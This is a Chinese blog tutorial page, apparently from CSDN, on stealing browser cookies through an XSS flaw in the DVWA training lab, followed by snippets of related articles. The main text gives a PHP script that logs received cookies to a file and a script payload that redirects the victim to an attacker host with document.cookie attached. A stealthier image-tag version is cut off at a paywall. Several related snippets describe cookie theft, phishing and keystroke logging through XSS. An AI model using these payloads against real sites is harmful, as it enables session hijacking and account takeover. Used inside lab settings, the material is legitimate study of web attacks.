XSS漏洞利用——获取cookie

最新推荐文章于 2024-07-23 19:19:53 发布

没有如果ru果

最新推荐文章于 2024-07-23 19:19:53 发布

阅读量1.7k

点赞数 2

分类专栏： web渗透

本文链接：https://blog.csdn.net/cxrpty/article/details/104417374

版权

本文通过实验环境DVWA演示了XSS漏洞利用的过程，包括创建PHP脚本来获取并存储Cookie值，构造URL诱导用户触发发送Cookie，以及如何隐蔽地在HTML图片标签中插入攻击代码，实现Cookie的窃取。

摘要由CSDN通过智能技术生成

实验环境：DVWA

实验步骤：

一、在服务器创建一个1.php文件获取cookie值，并将cookie值写入1.txt中

php代码如下：

<?php
 $file=fopen("1.txt","a");
 if($_GET['cookie']){
  $cookie=$_GET['cookie'];
  fputs($file,"$cookie\r\n");
 }
?>

二、构造url，当用户打开url时自动将其本地cookie发送到1.txt中

三、将代码和本地cookie进行拼接

代码如下：

<script>document.location='http://192.168.1.101/xss/1.php?cookie='+document.cookie;</script>

四、打开DVWA（选择低级别）执行代码，结果如下：

上述代码会将用户访问的页面跳转到空白页，太明显，所以可将代码插入到图片标签中

代码如下：


<script>document.body.innerHTML+="<img src='http://192.168.1.101/xss/1.php?cookie="+document.c

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

没有如果ru果

关注关注

2
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

XSS漏洞利用之cookie获取

内心不种满鲜花就会长满杂草

08-01

1万+

目录环境搭建盗取cookie 关于documen.cookie获取不到cookie httponly 刚学习xss的时候我们都知道只要能弹窗就肯定存在xss漏洞，也知道xss是可以盗取cookie的，但是至于怎么盗取cookie其实很多同学可能还不是很清楚，也可能并没有实质性的去探讨过这个问题。环境搭建思路：攻击者本地搭建的一个网站存在xss漏洞，并且在与网站同一个ip的服务器中使用浏览器进行了登录，此时访问了一个恶意链接，这个恶意链接，直接将cookie获取并发送到hacker服务

ctf xss利用_利用存储型XSS跨站漏洞偷取用户Cookie实战

weixin_42611310的博客

02-23

1622

声明 :严禁读者利用以下介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !攻击者要偷取Cookie , 就要让他们精心构造的恶意代码在受害者的计算机上运行 , 一般来说 , 是在用户访问一个网页的时候执行一段JavaScript代码 , 这段代码会...

参与评论您还未登录，请先登录后发表或查看评论

XSS窃取cookie以及XSSflash攻击钓鱼

最新发布

C233333235的博客

07-23

373

软件。

存储型XSS结合XSS平台获取cookie信息进后台——efucms

W小哥

12-29

5410

实验目的：利用存储型XSS获取管理员Cookie信息，修改本地Cookie信息为管理员Cookie，以管理员身份不输入用户名、密码直接登陆后台受害者浏览器：谷歌浏览器（也就是网站管理员使用的浏览器）攻击者浏览器：火狐渗透便捷版浏览器一、攻击者利用XSS漏洞攻击过程第一步：使用火狐渗透测试便捷版浏览器打开目标网站第二步：找到可以发表评论的地方，输入进行XSS测试，看是否弹窗，若弹窗则说明...

web安全中存储型XSS手动获取cookie信息

qq_63539335的博客

01-14

589

web安全中存储型XSS漏洞，基础手工攻击演示

漏洞复现篇——利用XSS漏洞获取cookie

爱国小白帽

02-20

3040

实验环境： PHPstudy 火狐浏览器、IE DVWA靶场

使用XSS漏洞获取用户cookie并免密登录实验

qq_43395215的博客

05-17

3308

使用XSS漏洞盗取cookie,并绕过密码登录首先环境的搭建，使用DVWA平台的XSS漏洞，这个DVWA的XSS漏洞在前面都讲过，所以我们直接使用LOW等级获取cookie，并保存在Web服务器上，这里使用LOW等级是为了方便，其他等级都是一样的做法，只是构造的脚本不同使用脚本获取cookie <script>alert(document.cookie)</script> 这是一个很简单的XSS漏洞，可以弹出用户的cookie，但是现在我们不是要将cookie弹出，而是将其保存

【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取，钓鱼以及键盘监听吗？--- XSS实战篇

m0_67844671的博客

10-05

4336

你知道xss漏洞如何利用吗？本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取，钓鱼获取用户名密码以及监听键盘记录等，让你对xss漏洞有进一步认识。

XSS漏洞——渗透day08

qq_62716256的博客

09-04

581

XSS漏洞——渗透day08

2.XSS漏洞（获取用户的cookie）——小白笔记——DVWA

qwsn

11-17

2448

0x01：用户的cookie 1.cookie：在浏览器端存储用户身份信息的一种机制 2.用户信息包含：用户名和密码（经过加密处理保存在cookie里） 0x02：检测实例1 1.检测1： <script>alert('hack u')</script> //检测 2.检测2： <script>for(var i=0;i<100000;i...

xss文件页面内容读取(解决)

09-05

xss文件页面内容读取(解决),需要的朋友可以参考下。

XSS ———— （二）利用反射型XSS窃取用户Cookie信息并利用

weixin_43102772的博客

02-27

1136

思路：搭建能接收cookie的服务器构建带有XSS恶意代码的url 发给用户诱导用户点击url 获得用户cookie并利用实验环境： kali————充当攻击者接收cookie的服务器 192.168.0.53 DVWA————充当客户要访问的目标网站 centos7————充当用户客户端小试牛刀：一、搭建服务器 1. kali开启Apache服务 systemctl start a...

XSS——利用MetInfo6.1.3存储XSS漏洞盗取管理员cookie登录

迷风小白

05-24

3166

一、环境准备 1.1环境 Web环境：wamp64 MetInfo版本：6.1.3 1.2漏洞概述漏洞类型：XSS漏洞危险等级：中 CVE编号：CVE-2018-20486 1.3xss平台在xss平台上注册一个账号，并创建一个默认模块。用于接收管理员cookie 二、漏洞复现 2.1 通过构造URL触发漏洞,并将xss平台的代码插入其中 127.0.0.1/test/admin/log...

xss获取cookie

kiihuang的博客

03-31

891

主要是借助存储型xss漏洞，来进行攻击的，获取每个访问人的cookie

2021-09-01 网安实验-XSS-存储型XSS获取用户cookie

热门推荐

时光隧道

09-02

4万+

一：存储型XSS 1.保存用户cookie 我们可以通过JS，构造一个请求，来请求一个我们有权限的页面，在构造请求的时候，把用户的cookie当作参数传过去，然后我们就可以在这个页面里，接收传过来的参数，然后再保存起来。所以首先需要写一个接收cookie的页面，它能够接收某个参数，然后保存起来。页面写好保存在c:\wamp\www\xss\的目录下，recv_cookies.php这个文件就是用来接收cookie并保存的，源码如下： 2.构造语句 <script>document.write(

XSS之存储型xss获取cookie试验(ajax方法)

qq_34847808的博客

06-13

4395

1、首先我写了个非常简易的留言板，没有做人任何安全处理，能使用存储型xss2、留言里写入能够发送请求的js代码，提交后服务器将代码存储到服务器中，用户访问的时候就会触发这段xss代码。让访问这个页面的用户能够发送一个请求并附带自己的cookie信息。3、第二步请求的目标主机上放置一个脚本用来接收这个请求然后保存在文本中具体步骤：一、登录我写的留言板,留言写入xss代码提交后页面显示如下：内容被被保...

DVWA下利用XSS获取Cookie

When you collect everything, you understand nothing.

09-06

3413

众所周知，利用XSS攻击，可以在用户登陆存在漏洞的站点之后，获取用户的Cookie值。有了Cookie，我们便可以在不知道用户名密码的情况下，模拟用户登陆站点。本文记录一次在DVWA漏洞平台的XSS(Reflected)模块下，利用XSS获取该平台登陆Cookie的实验。 0x00实验准备实验环境： DVWA：Windows 7，存在XSS网站；|IP: 192.168.124.6| 主机...

实战:存储型XSS攻击获取Cookie及防御

qq_43535990的博客

11-06

9051

实战:存储型XSS攻击获取Cookie及防御一、存储型XSS攻击原理二、搭建测试网站1.phpstudy开启Apache和mysql服务2.搭建数据库3.创建网站文件4.书写代码三、创建xss攻击文件四、上传payload获得用户Cookie 一、存储型XSS攻击原理在讲解存储型XSS攻击之前，我们要先明白XSS是个什么东西。 XSS（Cross Site Scripting）跨站脚本攻击，是指攻击者利用Web服务器中的应用程序或代码漏洞，在页面中嵌入客户端脚本（通常是一段由JavaScript编写的恶意